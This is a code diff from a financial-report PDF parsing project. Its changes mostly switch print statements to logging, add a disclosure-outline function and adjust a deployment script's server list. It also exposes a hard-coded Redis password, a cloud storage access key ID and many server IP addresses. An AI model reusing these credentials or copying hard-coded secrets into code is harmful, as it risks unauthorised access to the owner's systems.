PATTERN = '品牌类型|分门店|销售渠道|行业名称|产品名称|地区名称|子公司名称|业绩快报|调整情况说明|调整年初资产负债表|主要子公司|分部|母公司资产负债表|显示服务|渠道|商品类型|合同分类|会计政策变更|地区分类|研发项目|分类产品|表头不合规的表格|内部控制评价|关联方|国内地区|国外地区|销售区域|存货库龄|外币|逾期60天以上|欧元|英镑|美元|日元' PATTERN = '品牌类型|分门店|销售渠道|行业名称|产品名称|地区名称|子公司名称|业绩快报|调整情况说明|调整年初资产负债表|主要子公司|分部|母公司资产负债表|显示服务|渠道|商品类型|合同分类|会计政策变更|地区分类|研发项目名称|分类产品|表头不合规的表格|内部控制评价|关联方|国内地区|国外地区|销售区域|存货库龄|外币|逾期60天以上|欧元|英镑|(?<=\d)美元|\美元(?=\d)|日元'
MUILT_PATTERN = '调整前' MUILT_PATTERN = '调整前'
#unit_pattern = re.compile(r'单位[|:]?(百万元|千万元|亿元|万元|千元|元)') #unit_pattern = re.compile(r'单位[|:]?(百万元|千万元|亿元|万元|千元|元)')
unit_pattern = re.compile(r'(单位|单元|人民币).{0,6}?(百万元|千万元|亿元|万元|千元|元).{0,3}?')#修改单位匹配规则,不限制冒号,只限制距离 unit_pattern = re.compile(r'(单位|单元|人民币).{0,6}?(百万元|千万元|亿元|万元|千元|元).{0,3}?')#修改单位匹配规则,不限制冒号,只限制距离
@ -81,7 +80,7 @@ def safe_process_array(func, arr):
try: try:
return func(arr) return func(arr)
except Exception as e: except Exception as e:
print(f"这个函数出现了报错{func.__name__}: {e}") logger.info(f"这个函数出现了报错{func.__name__}: {e}")
return arr # 返回原数组以便继续后续处理 return arr # 返回原数组以便继续后续处理
#单独针对三季报的资产负债表识别合并问题 #单独针对三季报的资产负债表识别合并问题
@ -199,7 +198,7 @@ def process_array_with_grants(arr, keywords=['本报告期', '年初至报告期
def get_table_range(file_path, file_id, pages, tables_range): def get_table_range(file_path, file_id, pages, tables_range):
print('Run task %s (%s)...' % (f'解析表格{pages}', os.getpid())) logger.info(f'Run task 解析表格--{pages} {os.getpid()}')
start = time.time() start = time.time()
conn = mysql.connector.connect( conn = mysql.connector.connect(
@ -223,12 +222,26 @@ def get_table_range(file_path, file_id, pages, tables_range):
try: try:
tables = camelot.read_pdf(file_path, pages=pages, strip_text=',\n', copy_text=['v','h'],shift_text = ['l']) tables = camelot.read_pdf(file_path, pages=pages, strip_text=',\n', copy_text=['v','h'],shift_text = ['l'])
for t in tables: for t in tables:
top = t._bbox[3] top = t._bbox[3]
buttom = t._bbox[1] buttom = t._bbox[1]
page_num = int(t.page) page_num = int(t.page)
table_index = int(t.order) table_index = int(t.order)
arr = np.array(t.data) arr = np.array(t.data)
if page_num != 0:
# 表格数据写入
line_texts = []
for lines in t.data:
lines = list(set(lines))
for line in lines:
line_texts.append(line)
db_service.batch_insert_page_text_nocheck({
'file_id': file_id,
'page_num' : page_num,
'text' : line_texts
},conn,cursor)
arr = safe_process_array(process_array, arr) #部分资产负债表合并问题 arr = safe_process_array(process_array, arr) #部分资产负债表合并问题
arr = safe_process_array(process_array_with_annual_comparison, arr) #复杂表格的优化"多个上年同期时处理" arr = safe_process_array(process_array_with_annual_comparison, arr) #复杂表格的优化"多个上年同期时处理"
arr = safe_process_array(process_array_with_grants, arr) #三季报的非经常损益 arr = safe_process_array(process_array_with_grants, arr) #三季报的非经常损益
@ -421,8 +434,14 @@ def get_table_range(file_path, file_id, pages, tables_range):
"data" : new_data, "data" : new_data,
'sort_num' : page_num*1000 - top 'sort_num' : page_num*1000 - top
}},conn_app,cursor_app) }},conn_app,cursor_app)
except Exception as e: except Exception as e:
print(f'camelot解析表格时出现了{e}') logger.info(f'camelot解析表格时出现了{e}')
get_text_content(file_path, file_id, tables_range, pages, conn, cursor, redis_client, conn_app, cursor_app) get_text_content(file_path, file_id, tables_range, pages, conn, cursor, redis_client, conn_app, cursor_app)
cursor.close() cursor.close()
@ -432,7 +451,7 @@ def get_table_range(file_path, file_id, pages, tables_range):
redis_client.close() redis_client.close()
end = time.time() end = time.time()
print('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start))) logger.info('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
def text_in_table(top, tables_range, page_num): def text_in_table(top, tables_range, page_num):
if tables_range.get(page_num): if tables_range.get(page_num):
@ -468,7 +487,7 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
page_start = pages.split('-')[0] page_start = pages.split('-')[0]
page_end = pages.split('-')[1] page_end = pages.split('-')[1]
print(f'pages的值为{pages}') logger.info(f'pages的值为{pages}')
select_year_select = f"""select report_type,year from report_check where id = {file_id}""" select_year_select = f"""select report_type,year from report_check where id = {file_id}"""
cursor.execute(select_year_select) cursor.execute(select_year_select)
record_select = cursor.fetchall() record_select = cursor.fetchall()
@ -513,8 +532,8 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
line_text = re.sub(r"\s", "", line_text) line_text = re.sub(r"\s", "", line_text)
#提取符合要求的文本写入pdf_text_info用于文本书写错误识别 #提取符合要求的文本写入pdf_text_info用于文本书写错误识别
if not utils.pdf_text_flag(line_text): # if not utils.pdf_text_flag(line_text):
line_texts.append(line_text) line_texts.append(line_text)
#db_service.insert_pdf_text_info({ #db_service.insert_pdf_text_info({
# 'file_id': file_id, # 'file_id': file_id,
# 'page_num' : pagenum+1, # 'page_num' : pagenum+1,
@ -536,7 +555,7 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
if text_type in ('page_header','page_footer'): if text_type in ('page_header','page_footer'):
break break
if pagenum ==44: if pagenum ==44:
print(f'line_text在第44页的值有{line_text}') logger.info(f'line_text在第44页的值有{line_text}')
#这个对一整页都有用,会去掉很多正确的表 #这个对一整页都有用,会去掉很多正确的表
# 记录需要过滤掉的页码 # 记录需要过滤掉的页码
if len(re.findall('母公司|现金流量表补充', line_text)) > 0 : if len(re.findall('母公司|现金流量表补充', line_text)) > 0 :
@ -546,10 +565,11 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
'type': 'parent_com', 'type': 'parent_com',
},conn_app,cursor_app) },conn_app,cursor_app)
# 保存每个表格上方小范围区域的文字,这部分内容包含了表格的标题和指标单位 # 保存每个表格上方小范围区域的文字,这部分内容包含了表格的标题和指标单位
table_info = {} table_info = {}
if utils.check_table_title_black_list(line_text,title_list): if utils.check_table_title_black_list(line_text,title_list):
db_service.insert_measure_parser_info({ db_service.insert_measure_parser_info({
'file_id': file_id, 'file_id': file_id,
'content': f"{range['page_num']}_{range['table_index']}", 'content': f"{range['page_num']}_{range['table_index']}",
@ -613,6 +633,8 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
table_info = {} table_info = {}
# 记录需要过滤掉的页码 # 记录需要过滤掉的页码
if len(re.findall('母公司|现金流量表补充', line_text)) > 0: if len(re.findall('母公司|现金流量表补充', line_text)) > 0:
logger.info(f'line_text{line_text}')
logger.info(f'pagenum{pagenum}')
db_service.insert_measure_parser_info({ db_service.insert_measure_parser_info({
'file_id': file_id, 'file_id': file_id,
'content': pagenum+2, 'content': pagenum+2,
@ -665,8 +687,8 @@ def get_text_content(pdf_path,file_id,tables_range,pages,conn,cursor,redis_clien
'text' : line_texts 'text' : line_texts
},conn,cursor) },conn,cursor)
except Exception as e: except Exception as e:
print(f'{pagenum}页处理异常') logger.info(f'{pagenum}页处理异常')
print(e) logger.info(e)
def get_table_unit_info(file_id,line_text,page_num,table_index): def get_table_unit_info(file_id,line_text,page_num,table_index):
@ -725,7 +747,7 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
uri=MILVUS_CLIENT, uri=MILVUS_CLIENT,
) )
print('提取指标任务 %s (%s)...' % (record_range, os.getpid())) logger.info('提取指标任务 %s (%s)...' % (record_range, os.getpid()))
start = time.time() start = time.time()
record_start = record_range.split('-')[0] record_start = record_range.split('-')[0]
record_end = record_range.split('-')[1] record_end = record_range.split('-')[1]
@ -739,9 +761,7 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
rows, cols = arr.shape rows, cols = arr.shape
if rows == 1 and cols == 1: if rows == 1 and cols == 1:
continue continue
row_num , col_num = -1 , -1 row_num , col_num = -1 , -1
# 使用嵌套循环遍历数组,获取第一个数值位置 # 使用嵌套循环遍历数组,获取第一个数值位置
for i in range(rows): for i in range(rows):
for j in range(cols): for j in range(cols):
@ -834,6 +854,8 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
redis_client.incr(f'parsed_measure_count_{file_id}') redis_client.incr(f'parsed_measure_count_{file_id}')
if len(measure_list) > 0: if len(measure_list) > 0:
data_dict["measure_list"] = measure_list data_dict["measure_list"] = measure_list
data_dict["page_num"] = f"{str(t['page_num'])}_{str(t['table_index'])}" data_dict["page_num"] = f"{str(t['page_num'])}_{str(t['table_index'])}"
@ -841,12 +863,12 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
measure_obj.append(data_dict) measure_obj.append(data_dict)
db_service.insert_measure_data_to_milvus(client,partition_name,measure_obj,cursor_app,conn_app) db_service.insert_measure_data_to_milvus(client,partition_name,measure_obj,cursor_app,conn_app)
except Exception as e: except Exception as e:
print(f"循环获取表格数据这里报错了,数据是{t['data']},位置在{index}") logger.info(f"循环获取表格数据这里报错了,数据是{t['data']},位置在{index}")
print(f"错误是:{e}") logger.info(f"错误是:{e}")
end = time.time() end = time.time()
print('提取指标 %s runs %0.2f seconds.' % (record_range, (end - start))) logger.info('提取指标 %s runs %0.2f seconds.' % (record_range, (end - start)))
except Exception as e: except Exception as e:
print(f'这个错误是{e},所在的位置是{record_start}-{record_end}') logger.info(f'这个错误是{e},所在的位置是{record_start}-{record_end}')
record_start = record_range.split('-')[0] record_start = record_range.split('-')[0]
record_end = record_range.split('-')[1] record_end = record_range.split('-')[1]
for index in range(int(record_start),int(record_end)): for index in range(int(record_start),int(record_end)):
@ -857,7 +879,7 @@ def get_table_measure(file_id, pdf_tables, record_range,partition_name,):
try: try:
arr = np.array(t['data']) arr = np.array(t['data'])
except Exception as e: except Exception as e:
print(f'这个错误是{e}的arr的值是{arr}') logger.info(f'这个错误是{e}的arr的值是{arr}')
finally: finally:
redis_client.close() redis_client.close()
cursor.close() cursor.close()
@ -877,7 +899,7 @@ def dispatch_job(job_info):
get_table_range(path, file_id, page_num, tables_range) get_table_range(path, file_id, page_num, tables_range)
except Exception as e: except Exception as e:
print(e) logger.info(e)
#指标归一化处理 #指标归一化处理
@ -901,7 +923,7 @@ def update_measure_data(file_id,file_path,parent_table_pages,partition_name):
# 创建一个cursor对象来执行SQL语句 # 创建一个cursor对象来执行SQL语句
cursor_app = conn_app.cursor(buffered=True) cursor_app = conn_app.cursor(buffered=True)
print(f'目录黑名单为:{parent_table_pages}') logger.info(f'目录黑名单为:{parent_table_pages}')
db_service.delete_to_run(conn,cursor,file_id) db_service.delete_to_run(conn,cursor,file_id)
db_service.insert_table_measure_from_vector_async_process(cursor,parent_table_pages,file_id,file_path, partition_name) db_service.insert_table_measure_from_vector_async_process(cursor,parent_table_pages,file_id,file_path, partition_name)
@ -913,6 +935,44 @@ def update_measure_data(file_id,file_path,parent_table_pages,partition_name):
cursor_app.close() cursor_app.close()
conn_app.close() conn_app.close()
# def merge_consecutive_arrays(word_info):
# merged_objects = []
# temp_list = []
# for info_obj in word_info:
# try:
# if info_obj['type'] == 'table':
# # 如果对象是表格,将其元素添加到临时列表中
# data = info_obj['data']
# if not data:
# continue
# first_row = data[0]
# if all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) == 0:
# temp_list.append(info_obj)
# elif all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
# merged_objects.append(temp_list)
# temp_list = []
# temp_list.append(info_obj)
# elif not all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
# temp_data = temp_list[-1]['data']
# temp_data = list(temp_data)
# for row in list(info_obj['data']):
# temp_data.append(row)
# info_obj['data'] = temp_data
# temp_list.clear()
# temp_list.append(info_obj)
# except Exception as e:
# applog.error(f"解析数据错误: {e}")
# if temp_list:
# merged_objects.append(temp_list)
# return merged_objects
def merge_consecutive_arrays(pdf_info): def merge_consecutive_arrays(pdf_info):
merged_objects = [] merged_objects = []
temp_array = {} temp_array = {}
@ -941,7 +1001,7 @@ def merge_consecutive_arrays(pdf_info):
temp_array = {} # 重置临时列表 temp_array = {} # 重置临时列表
except Exception as e: except Exception as e:
#print(info_obj) #print(info_obj)
print(f"解析数据错误: {e}") logger.info(f"解析数据错误: {e}")
if temp_array: if temp_array:
merged_objects.append(temp_array) merged_objects.append(temp_array)
@ -980,7 +1040,7 @@ def merge_consecutive_arrays_v1(pdf_info):
merged_objects.append(temp_array) merged_objects.append(temp_array)
temp_array = {} # 重置临时列表 temp_array = {} # 重置临时列表
except Exception as e: except Exception as e:
print(f"解析数据错误: {e}") logger.info(f"解析数据错误: {e}")
# 循环结束后,检查临时列表是否非空,如果非空,则添加到结果中 # 循环结束后,检查临时列表是否非空,如果非空,则添加到结果中
if temp_array: if temp_array:
@ -1017,7 +1077,7 @@ def start_table_measure_job(file_id,partition_name):
redis_client.close() redis_client.close()
records_range_parts = utils.get_range(len(pdf_tables),MEASURE_COUNT) records_range_parts = utils.get_range(len(pdf_tables),MEASURE_COUNT)
print(f'records_range_part识别页码的值为{records_range_parts}') logger.info(f'records_range_part识别页码的值为{records_range_parts}')
processes = [] processes = []

110753
zzb_data_prod/nohup.out Normal file

File diff suppressed because one or more lines are too long

View File

@ -157,7 +157,7 @@ def create_text_outline(pdf_path, file_id):
if len(re.findall('财务报表主要项目注释', title)) == 0: if len(re.findall('财务报表主要项目注释', title)) == 0:
page_end = page_end - 1 page_end = page_end - 1
# print(title,page_start,page_end) # print(title,page_start,page_end)
for i in range(page_start, page_end + 1): for i in range(page_start, page_end):
# 将每个数字添加到列表中 # 将每个数字添加到列表中
parent_table_pages_local[file_id].append(i) parent_table_pages_local[file_id].append(i)
file_info['page_count'] = page_count file_info['page_count'] = page_count
@ -168,6 +168,68 @@ def create_text_outline(pdf_path, file_id):
return file_info return file_info
def create_text_outline_disclosure(pdf_path, file_id):
# print('Running the script for [%s] with padding [%d]' % (pdf_path, page_number_padding))
# creating an object
with open(pdf_path, 'rb') as file:
file_info = {}
fileReader = PyPDF2.PdfReader(file)
page_count = len(fileReader.pages)
redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)
redis_client.set(f'page_count_{file_id}', page_count)
info = {
'page_count': page_count,
'all_pages': {},
'current_page_id': 1,
'padding': 0
}
print('Number of pages: %d' % info['page_count'])
pages = fileReader.trailer['/Root']['/Pages'].get_object()
recursive_numbering(pages, info)
#for page_num, page in enumerate(pages['/Kids']):
# page_obj = page.getObject()
# all_pages[id(page_obj)] = page_num + 1 # who starts counting from 0 anyways?
title_array = get_tree_pages(fileReader.outline, info, 0, [])
#db_service.pdf_title_insert_mysql(file_id,title_array)
#title_array = db_service.get_file_info_from_mysql(file_id)
parent_table_pages_local = {}
parent_table_pages_local[file_id] = []
print(f'{file_id}:{len(title_array)}')
for i in range(len(title_array)):
title_obj = title_array[i]
title = title_obj['title']
#print(f'标题分别是{title}')
if len(re.findall('母公司|现金流量表补充|重要会计政策|会计估计变更|公允价值的披露|合营安排或联营企业中的权益|与金融工具相关的风险|税项|主要控股参股公司|结构化主体情况|公司股份总数及股东结构变动及公司资产和负债结构的变动情况|所有权或使用权受到限制的资产|在建工程|固定资产|其他主体中的权益|分部信息|与金融工具相关的风险|其他关联交易|公司子公司重大事项', title)) >0 :
page_start = title_obj['page_num']
depth = title_obj['depth']
if i < len(title_array) - 1:
page_end = title_array[i+1]['page_num']
if title_array[i]['depth'] in [1,2]:
page_end = get_page_end(i+1, depth, title_array)
else:
page_end = page_count
print(f'目录识别时被丢弃的页码:{page_start}-{page_end}')
#当标题为母公司财务报表主要项目注释时最后一页不过滤避免核心roe指标无法召回
if len(re.findall('财务报表主要项目注释', title)) == 0:
page_end = page_end - 1
# print(title,page_start,page_end)
for i in range(page_start, page_end + 1):
# 将每个数字添加到列表中
parent_table_pages_local[file_id].append(i)
file_info['page_count'] = page_count
file_info['parent_table_pages'] = parent_table_pages_local[file_id]
file_info['split_parts'] = get_file_split(page_count)
redis_client.close()
return file_info
if __name__ == '__main__': if __name__ == '__main__':
import time import time
path = "/Users/zhengfei/Desktop/cb/2023年报检测/安妮股份.pdf" path = "/Users/zhengfei/Desktop/cb/2023年报检测/安妮股份.pdf"

View File

@ -2,18 +2,18 @@
# 设置文件路径和目标目录# 请注意这列的config文件是不可以进行传输的 /root/pdf_parser/zzb_data_prod/utils.py /root/pdf_parser/zzb_data_prod/db_service.py # 设置文件路径和目标目录# 请注意这列的config文件是不可以进行传输的 /root/pdf_parser/zzb_data_prod/utils.py /root/pdf_parser/zzb_data_prod/db_service.py
#FILES="/root/pdf_parser/zzb_data_prod/utils.py /root/pdf_parser/zzb_data_prod/db_service.py /root/pdf_parser/zzb_data_prod/app.py /root/pdf_parser/zzb_data_prod/main.py /root/pdf_parser/zzb_data_prod/pdf_title.py" #FILES="/root/pdf_parser/zzb_data_prod/utils.py /root/pdf_parser/zzb_data_prod/db_service.py /root/pdf_parser/zzb_data_prod/app.py /root/pdf_parser/zzb_data_prod/main.py /root/pdf_parser/zzb_data_prod/pdf_title.py"
FILES="/root/pdf_parser/zzb_data_prod/main.py" FILES="/root/pdf_parser/zzb_data_prod/put_code.sh"
DEST_PATH="/root/pdf_parser/zzb_data_prod" DEST_PATH="/root/pdf_parser/zzb_data_prod"
# 设置服务器列表 主服务器 "1.94.143.23" "113.44.72.157" "1.94.101.237" "123.60.16.225" "124.71.157.162" "1.94.60.103" "1.94.143.23" "124.71.149.225" "113.44.52.221" "121.37.137.13" # 设置服务器列表 主服务器 "1.94.143.23" "113.44.72.157" "1.94.101.237" "123.60.16.225" "124.71.157.162" "1.94.60.103" "1.94.143.23" "124.71.149.225" "113.44.52.221" "121.37.137.13"
#SERVERS=("113.44.72.157" "1.94.101.237" "123.60.16.225" "124.71.157.162" "1.94.60.103" "124.71.149.225" "113.44.52.221" "121.37.137.13" "123.60.28.83" "192.168.0.19" "192.168.0.53" "192.168.0.150" "192.168.0.210" "192.168.0.129" "192.168.0.24" "192.168.0.250" "192.168.0.162" "192.168.0.86" "192.168.0.88" "192.168.0.93" "192.168.0.228" "192.168.0.155" "192.168.0.186" "192.168.0.56" "192.168.0.185" "192.168.0.72" "192.168.0.35" "192.168.0.230" "192.168.0.125" "192.168.0.46" "192.168.0.131") #SERVERS=("113.44.72.157" "1.94.101.237" "123.60.16.225" "124.71.157.162" "1.94.60.103" "124.71.149.225" "113.44.52.221" "121.37.137.13" "123.60.28.83" "192.168.0.19" "192.168.0.53" "192.168.0.150" "192.168.0.210" "192.168.0.129" "192.168.0.24" "192.168.0.250" "192.168.0.162" "192.168.0.86" "192.168.0.88" "192.168.0.93" "192.168.0.228" "192.168.0.155" "192.168.0.186" "192.168.0.56" "192.168.0.185" "192.168.0.72" "192.168.0.35" "192.168.0.230" "192.168.0.125" "192.168.0.46" "192.168.0.131")
#SERVERS=("192.168.0.228" "192.168.0.155" "192.168.0.186" "192.168.0.56" "192.168.0.185") #SERVERS=("192.168.0.228" "192.168.0.155" "192.168.0.186" "192.168.0.56" "192.168.0.185")
#监管服务器 #监管服务器
SERVERS=("192.168.0.108" "192.168.0.131") #SERVERS=("192.168.0.108" "192.168.0.131")
#企业服务器 #企业服务器
#SERVERS=("192.168.0.163" "192.168.0.26" "192.168.0.2" "192.168.0.128" "192.168.0.136" "192.168.0.239") #SERVERS=("192.168.0.163" "192.168.0.26" "192.168.0.2" "192.168.0.128" "192.168.0.136" "192.168.0.239")
#两者一起 #两者一起
#SERVERS=("192.168.0.163" "192.168.0.26" "192.168.0.2" "192.168.0.128" "192.168.0.136" "192.168.0.239" "192.168.0.108" "192.168.0.131") SERVERS=("192.168.0.163" "192.168.0.26" "192.168.0.2" "192.168.0.128" "192.168.0.136" "192.168.0.239" "192.168.0.108" "192.168.0.131")
# 遍历每个服务器并上传文件 # 遍历每个服务器并上传文件
for SERVER in "${SERVERS[@]}"; do for SERVER in "${SERVERS[@]}"; do
echo "Uploading files to $SERVER" echo "Uploading files to $SERVER"

View File

@ -11,3 +11,5 @@ uvicorn
redis redis
ghostscript ghostscript
opencv-python-headless opencv-python-headless
python-docx
docx2pdf

View File

@ -9,6 +9,8 @@ import re,os,time
import requests import requests
import config import config
import numpy as np import numpy as np
import logging
log = logging.getLogger(__name__)
def get_md5(str): def get_md5(str):
import hashlib import hashlib
@ -29,13 +31,13 @@ def embed_with_str(input):
if resp.status_code == HTTPStatus.OK: if resp.status_code == HTTPStatus.OK:
return resp return resp
elif resp.status_code == 429: elif resp.status_code == 429:
print(f'触发限流,等待{t}秒后重试') log.info('触发限流,等待%s秒后重试', t)
retry += 1 retry += 1
t+=0.1 t+=0.1
else: else:
print(f'请求失败,状态码:{resp.status_code}') log.info('请求失败,状态码:%s', resp.status_code)
return None return None
print('重试超过上限') log.info('重试超过上限')
return None return None
#如果存在‘归属于|扣非’,就保留括号内的内容,并去掉标点符号和中文数字。 #如果存在‘归属于|扣非’,就保留括号内的内容,并去掉标点符号和中文数字。
@ -111,10 +113,10 @@ def save_pdf_from_url(url, file_path):
with open(local_file_path, 'wb') as file: with open(local_file_path, 'wb') as file:
file.write(response.content) file.write(response.content)
print(f"文件已下载到 {local_file_path}") log.info("文件已下载到 %s", local_file_path)
else: else:
# 文件下载失败 # 文件下载失败
print(f"无法下载文件,状态码:{response.status_code}") log.info("无法下载文件,状态码:%s", response.status_code)
return local_file_path return local_file_path
@ -225,7 +227,15 @@ def get_percent_growth(text):
def check_black_list(meta_measure,pdf_measure): def check_black_list(meta_measure,pdf_measure):
# 判断指标名是否包含黑名单词 # 判断指标名是否包含黑名单词
#black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年度公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用','上年年末:1月1日'] #black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年度公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用']
# for black in black_array:
# black_meta = black.split(':')[0]
# black_pdfs = black.split(':')[1].split(',')
# if meta_measure.find(black_meta) >= 0:
# for pdf in black_pdfs:
# if pdf_measure.find(pdf) >= 0:
# return True
# return False
black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计','营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总' black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计','营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
,'归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司' ,'归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司'
,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除' ,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除'
@ -344,17 +354,17 @@ def get_change_rate_flag(text):
if __name__ == '__main__': if __name__ == '__main__':
print(under_non_alpha_ratio('②2022年度')) log.info(under_non_alpha_ratio('②2022年度'))
# title = '母公司财务报表主要项目注释' # title = '母公司财务报表主要项目注释'
# if len(re.findall('母公司|现金流量表补充', title)) >0 and len(re.findall('项目注释', title)) == 0: # if len(re.findall('母公司|现金流量表补充', title)) >0 and len(re.findall('项目注释', title)) == 0:
# print('1') # log.info('1')
# else: # else:
# print('0') # log.info('0')
# print(check_black_list('当期投资活动现金流净额','当前筹资活动现金流净额')) # log.info(check_black_list('当期投资活动现金流净额','当前筹资活动现金流净额'))
# test = '2023年1-12月' # test = '2023年1-12月'
# print(get_period_type('上年度本期费用化研发投入')) # log.info(get_period_type('上年度本期费用化研发投入'))
# print(get_period_type('费用化研发投入本年度')) # log.info(get_period_type('费用化研发投入本年度'))
# vector_a = embed_with_str('第一季度营业收入') # vector_a = embed_with_str('第一季度营业收入')
# vector = vector_a.output["embeddings"][0]["embedding"] # vector = vector_a.output["embeddings"][0]["embedding"]
@ -362,7 +372,7 @@ if __name__ == '__main__':
# vector1 = vector_b.output["embeddings"][0]["embedding"] # vector1 = vector_b.output["embeddings"][0]["embedding"]
# similarity = cosine_similarity(vector, vector1) # similarity = cosine_similarity(vector, vector1)
# print(f"余弦相似度: {similarity}") # log.info("余弦相似度: %s", similarity)
# measure_data = [ # measure_data = [
# '1,1,营业收入2023年金额,1003535799.51', # '1,1,营业收入2023年金额,1003535799.51',
@ -577,21 +587,14 @@ if __name__ == '__main__':
# ) # )
# vector_obj = embed_with_str('2023年营业收入') # vector_obj = embed_with_str('2023年营业收入')
# vector = vector_obj.output["embeddings"][0]["embedding"] # vector = vector_obj.output["embeddings"][0]["embedding"]
# data = [vector]
# res = client.search(
# collection_name="zzb_measure", # Replace with the actual name of your collection
# # Replace with your query vector
# data=data,
# limit=1, # Max. number of search results to return
# search_params={"metric_type": "COSINE", "params": {}}, # Search parameters
# output_fields=["measure_name","measure_value"]
# )
# # Convert the output to a formatted JSON string # vector_b = embed_with_str('营业收入第一季度')
# result = json.dumps(res, indent=4, ensure_ascii=False) # vector1 = vector_b.output["embeddings"][0]["embedding"]
# print(result)
# similarity = cosine_similarity(vector, vector1)
# log.info("余弦相似度: %s", similarity)
# insert_measure_data(client, measure_data) # insert_measure_data(client, measure_data)
# text = '营业收入第一季度1-3月份' # text = '营业收入第一季度1-3月份'
# new_text = re.sub(r'[^)]*', '',text) # new_text = re.sub(r'[^)]*', '',text)
# print(new_text) # log.info(new_text)

3
zzb_data_prod/test.pdf Normal file
View File

@ -0,0 +1,3 @@
--2024-12-27 11:23:36-- https://financial-report.obs.cn-east-3.myhuaweicloud.com/upload/file/44b374ac0fe140a2922c360db47335a1.PDF?AccessKeyId=WMBIZTLULUR24OBUIRC4
Resolving financial-report.obs.cn-east-3.myhuaweicloud.com (financial-report.obs.cn-east-3.myhuaweicloud.com)... failed: Name or service not known.
wget: unable to resolve host address financial-report.obs.cn-east-3.myhuaweicloud.com

View File

@ -1,154 +1,14 @@
#coding=utf-8 # -*- coding: utf-8 -*-
import sys,ast import re
from pdfminer.high_level import extract_text
from pdfminer.pdfparser import PDFParser
from pdfminer.pdfdocument import PDFDocument
from pdfminer.pdfpage import PDFPage
import utils
import mysql.connector
from pymilvus import connections,MilvusClient
import json
import db_service
import ast
import numpy as np import numpy as np
import config
import redis_service
from config import MILVUS_CLIENT,MYSQL_HOST,MYSQL_USER,MYSQL_PASSWORD,MYSQL_DB
import main
import redis
def measure_config_to_db(conn,cursor):
insert_query = '''
INSERT INTO measure_config
(measure_id, measure_name, ori_measure_id, ori_measure_name)
VALUES (%s, %s, %s, %s)
'''
check_query = '''
select ori_measure_id from measure_config
'''
# 打开文本文件
with open('/Users/zhengfei/work/zzb_data/measure_config_all.txt', 'r') as file:
# 读取所有行到一个列表中
lines = file.readlines()
# 打印每一行
for line in lines:
config_list = line.strip().split(',')
measure = config_list[0]
ori_measure = config_list[1]
ori_measure_id = utils.get_md5(ori_measure)
# 判断数据库中是否有数据
# cursor.execute(check_query.format(ori_measure_id=ori_measure_id))
# check_records = cursor.fetchall()
# if(len(check_records)) > 0:
# continue
data_to_insert = (utils.get_md5(measure), measure, ori_measure_id, ori_measure)
cursor.execute(insert_query, data_to_insert)
conn.commit()
def insert_measure_vector(conn,cursor):
redis_client = redis.Redis(host='192.168.0.172', port=6379, password='Xgf_redis', db=6)
# 执行SQL语句更新数据
select_query = '''
SELECT ori_measure_id,ori_measure_name FROM measure_config
'''
cursor.execute(select_query)
records = cursor.fetchall()
for record in records:
if redis_client.hexists('measure_config', record[0]):
measure_vector = redis_client.hget('measure_config', record[0])
else:
print('新增指标',record[1])
vector_obj = utils.embed_with_str(record[1])
measure_vector = str(vector_obj.output["embeddings"][0]["embedding"])
redis_client.hset('measure_config', record[0], measure_vector)
redis_client.close()
conn.close()
def contains_financial_indicators(text):
import re
# 正则表达式模式匹配千分位格式的数字和百分比
pattern = r"\d{1,3}(,\d{3})+(\.\d{1,3})?"
pattern1 = r"\d+(.\d+)+%?"
# 使用 re.search 函数查找匹配项
